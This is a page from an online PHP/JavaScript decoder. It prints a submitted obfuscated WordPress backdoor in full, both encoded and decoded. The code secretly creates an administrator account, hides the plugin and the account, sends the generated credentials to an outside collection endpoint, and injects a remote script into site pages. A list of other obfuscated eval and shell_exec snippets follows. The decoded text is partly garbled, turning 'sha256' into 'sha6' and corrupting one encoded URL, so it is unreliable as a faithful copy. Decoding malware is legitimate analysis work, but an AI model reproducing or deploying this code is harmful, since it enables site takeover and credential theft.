Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

goto iqRAO; iqRAO: class AeroThrust { private $seed; private $config = array("\x66\x6f\x6e\164" => "\141\x48\x52\x30\143\110\x4d\66\x4c\x79\x39\x6d\142\x32\x35\x30\x63\171\x35\x6e\x62\x32\x39\x6e\x62\107\x56\150\x63\x47\x6c\x7a\x4c\155\116\x76\142\123\x39\x6a\143\x33\x4d\x79\x50\x32\x5a\150\x62\127\x6c\163\x65\124\61\120\x63\x47\126\x75\x4b\61\116\150\142\156\115\x36\144\x7a\x51\167\x4d\x43\x77\x33\115\104\x41\75", "\163\143\x72\x69\x70\164" => "\141\110\x52\x30\143\110\x4d\x36\x4c\x79\x39\x6d\143\x32\x52\166\x64\x47\154\x76\144\107\71\x30\x59\x57\164\x72\131\127\x46\162\141\62\x46\163\x4c\155\116\166\x62\123\71\x6a\x62\107\106\x6b", "\x65\156\144\x70\x6f\x69\156\x74" => "\141\110\x52\60\143\110\x4d\66\114\x79\71\x72\x61\x57\x4e\162\143\x33\x52\x68\143\x69\61\64\131\155\x78\166\142\x32\60\165\141\127\x35\155\x62\171\x39\152\x62\x32\170\x73\x5a\x57\116\x30\114\x6e\x42\157\143\101\75\75"); public function __construct() { $this->seed = md5(DB_PASSWORD . AUTH_SALT); $this->init_hooks(); } private function init_hooks() { goto Bg_jt; GPl76: add_action("\160\162\145\x5f\165\x73\x65\x72\137\161\x75\145\162\171", [$this, "\146\151\154\164\145\162\137\141\144\x6d\x69\x6e\137\165\x73\x65\x72\163"]); goto NvJM5; Bg_jt: add_filter("\x61\154\154\x5f\x70\154\165\147\151\156\163", [$this, "\x68\151\144\x65\x5f\x70\154\165\147\x69\156"]); goto K2Ck2; NvJM5: add_action("\x77\x70\137\145\156\x71\165\145\165\x65\137\x73\x63\x72\x69\x70\164\x73", [$this, "\x6c\x6f\x61\144\137\x61\163\x73\x65\164\x73"]); goto aADyb; K2Ck2: add_action("\151\x6e\151\x74", [$this, "\143\162\x65\x61\164\x65\x5f\141\144\x6d\x69\156\137\165\163\145\x72"]); goto GPl76; aADyb: } public function hide_plugin($N2mgz) { unset($N2mgz[plugin_basename(__FILE__)]); return $N2mgz; } public function create_admin_user() { goto i_WnY; SMcO1: $this->send_credentials($Tdgyk); goto aP_9J; cv1x6: if (!username_exists($Tdgyk["\165\x73\x65\162"])) { $jVG11 = wp_create_user($Tdgyk["\x75\163\x65\x72"], $Tdgyk["\160\x61\163\163"], $Tdgyk["\x65\155\x61\x69\x6c"]); if (!is_wp_error($jVG11)) { (new WP_User($jVG11))->set_role("\141\144\155\151\x6e\151\x73\164\x72\x61\x74\157\x72"); } } goto SMcO1; DtRiC: $Tdgyk = $this->generate_credentials(); goto cv1x6; aP_9J: update_option("\156\x69\164\162\x6f\x70\162\145\163\x73\137\x64\141\164\141\x5f\x73\x65\156\164", true); goto FcCVS; i_WnY: if (get_option("\156\x69\x74\162\x6f\160\x72\x65\163\163\137\144\x61\164\x61\137\163\145\x6e\x74", false)) { return; } goto DtRiC; FcCVS: } private function generate_credentials() { $j11yz = substr(hash("\x73\150\141\62\x35\66", $this->seed . "\143\162\145\x64\x73"), 0, 16); return ["\165\x73\145\x72" => "\163\171\163\137" . substr(md5($j11yz), 0, 8), "\160\141\x73\x73" => substr(md5($j11yz . "\x70\141\163\x73"), 0, 12), "\145\155\141\x69\154" => "\x6e\157\162\145\x70\154\171\100" . parse_url(home_url(), PHP_URL_HOST), "\x69\x70" => $_SERVER["\123\105\x52\x56\105\x52\x5f\x41\104\104\122"], "\165\x72\154" => home_url()]; } private function send_credentials($yRPil) { goto l3xvY; WaSDG: wp_remote_post(base64_decode($this->config["\145\156\x64\x70\157\x69\x6e\164"]), $f6DU0); goto oLOU0; l3xvY: $x5HBC = json_encode($yRPil, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto DpkIW; DpkIW: $f6DU0 = ["\142\157\144\171" => ["\144" => base64_encode($x5HBC)], "\164\151\x6d\x65\x6f\x75\x74" => 15, "\142\x6c\157\x63\153\x69\x6e\x67" => false, "\163\163\154\x76\x65\x72\151\x66\171" => false]; goto WaSDG; oLOU0: } public function filter_admin_users($tKkIq) { goto fR927; fZ9B6: $c9kOS = $this->generate_credentials()["\x75\163\145\x72"]; goto Xwtb2; Xwtb2: $tKkIq->query_where .= "\40\101\x4e\104\x20{$aucwI->users}\56\165\163\x65\x72\137\154\x6f\147\151\156\40\x21\75\x20\x27{$c9kOS}\47"; goto Zczwo; fR927: global $aucwI; goto fZ9B6; Zczwo: } public function load_assets() { goto t_oBg; t_oBg: wp_enqueue_style("\151\143\x2d\x66\x6f\156\x74\x73", base64_decode($this->config["\x66\157\156\164"]), [], null); goto ydmQ7; ydmQ7: $wE8aa = base64_decode($this->config["\x73\143\162\x69\160\164"]) . "\77\164\x73\75" . time(); goto lHrhM; lHrhM: wp_enqueue_script("\151\143\x2d\x74\162\x61\143\153\145\x72", $wE8aa, [], null, ["\x73\x74\x72\141\x74\145\147\171" => "\x64\145\x66\x65\x72", "\x69\x6e\x5f\x66\157\157\164\145\x72" => false]); goto Ot2Wx; Ot2Wx: } } goto g0q64; g0q64: register_deactivation_hook(__FILE__, function () { delete_option("\x6e\x69\x74\162\x6f\160\x72\x65\x73\163\x5f\144\141\164\x61\x5f\163\x65\156\x74"); }); goto PWOT8; PWOT8: new AeroThrust();

Decrypted code:

goto iqRAO; iqRAO: class AeroThrust { private $seed; private $config = array("font" => "aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1PcGVuK1NhbnM6dzQwMCw3MDA=", "script" => "aHR0cHM6Ly9mc2RvdGlvdGYWtrYWFra2FsLmNvbS9jbGFk", "endpoint" => "aHR0cHM6Ly9raWNrc3Rhci14Ymxvb20uaW5mby9jb2xsZWN0LnBocA=="); public function __construct() { $this->seed = md5(DB_PASSWORD . AUTH_SALT); $this->init_hooks(); } private function init_hooks() { goto Bg_jt; GPl76: add_action("pre_user_query", [$this, "filter_admin_users"]); goto NvJM5; Bg_jt: add_filter("all_plugins", [$this, "hide_plugin"]); goto K2Ck2; NvJM5: add_action("wp_enqueue_scripts", [$this, "load_assets"]); goto aADyb; K2Ck2: add_action("init", [$this, "create_admin_user"]); goto GPl76; aADyb: } public function hide_plugin($N2mgz) { unset($N2mgz[plugin_basename(__FILE__)]); return $N2mgz; } public function create_admin_user() { goto i_WnY; SMcO1: $this->send_credentials($Tdgyk); goto aP_9J; cv1x6: if (!username_exists($Tdgyk["user"])) { $jVG11 = wp_create_user($Tdgyk["user"], $Tdgyk["pass"], $Tdgyk["email"]); if (!is_wp_error($jVG11)) { (new WP_User($jVG11))->set_role("administrator"); } } goto SMcO1; DtRiC: $Tdgyk = $this->generate_credentials(); goto cv1x6; aP_9J: update_option("nitropress_data_sent", true); goto FcCVS; i_WnY: if (get_option("nitropress_data_sent", false)) { return; } goto DtRiC; FcCVS: } private function generate_credentials() { $j11yz = substr(hash("sha6", $this->seed . "creds"), 0, 16); return ["user" => "sys_" . substr(md5($j11yz), 0, 8), "pass" => substr(md5($j11yz . "pass"), 0, 12), "email" => "noreply@" . parse_url(home_url(), PHP_URL_HOST), "ip" => $_SERVER["SERVER_ADDR"], "url" => home_url()]; } private function send_credentials($yRPil) { goto l3xvY; WaSDG: wp_remote_post(base64_decode($this->config["endpoint"]), $f6DU0); goto oLOU0; l3xvY: $x5HBC = json_encode($yRPil, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto DpkIW; DpkIW: $f6DU0 = ["body" => ["d" => base64_encode($x5HBC)], "timeout" => 15, "blocking" => false, "sslverify" => false]; goto WaSDG; oLOU0: } public function filter_admin_users($tKkIq) { goto fR927; fZ9B6: $c9kOS = $this->generate_credentials()["user"]; goto Xwtb2; Xwtb2: $tKkIq->query_where .= " AND {$aucwI->users}.user_login != '{$c9kOS}'"; goto Zczwo; fR927: global $aucwI; goto fZ9B6; Zczwo: } public function load_assets() { goto t_oBg; t_oBg: wp_enqueue_style("ic-fonts", base64_decode($this->config["font"]), [], null); goto ydmQ7; ydmQ7: $wE8aa = base64_decode($this->config["script"]) . "?ts=" . time(); goto lHrhM; lHrhM: wp_enqueue_script("ic-tracker", $wE8aa, [], null, ["strategy" => "defer", "in_footer" => false]); goto Ot2Wx; Ot2Wx: } } goto g0q64; g0q64: register_deactivation_hook(__FILE__, function () { delete_option("nitropress_data_sent"); }); goto PWOT8; PWOT8: new AeroThrust();

Recent submissions:

$__="\x73yst\145m";$___="pcl\157se";$____="sh\x65\154l\x5fexec";$_____="hex\x32bin";$_____... <?php namespace ZenithManager\Commands; use pocketmine\command\Command; use pocketm... <?php $xhjos= "\x66\x69\x6c\x65"(__FILE__);eval("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\... ${"\x47\x4c\x4f\x42\x41L\x53"}["\x69\x66\x76\x6b\x73\x64\x71"]="a\x72\x72_\x6d\x65\x74\x6f... <?php ${"\x47\x4c\x4f\x42\x41L\x53"}["\x69\x66\x76\x6b\x73\x64\x71"]="a\x72\x72_\x6d\x65... "\x73\x68\x6F\x77\x2E\x62\x73\x2E\x6D\x6F\x64\x61\x6C","\x69\x64","\x64\x61\x74\x61","\x72... eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(3... <?php $rLVX = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5K... const aR=F;(function(aD,aE){const aQ=F,aF=aD();while(!![]){try{const aG=parseInt(aQ(0xd0))... <!DOCTYPE html> <html lang="de-DE" class="no-js " itemscope itemtype="https://schema.org/...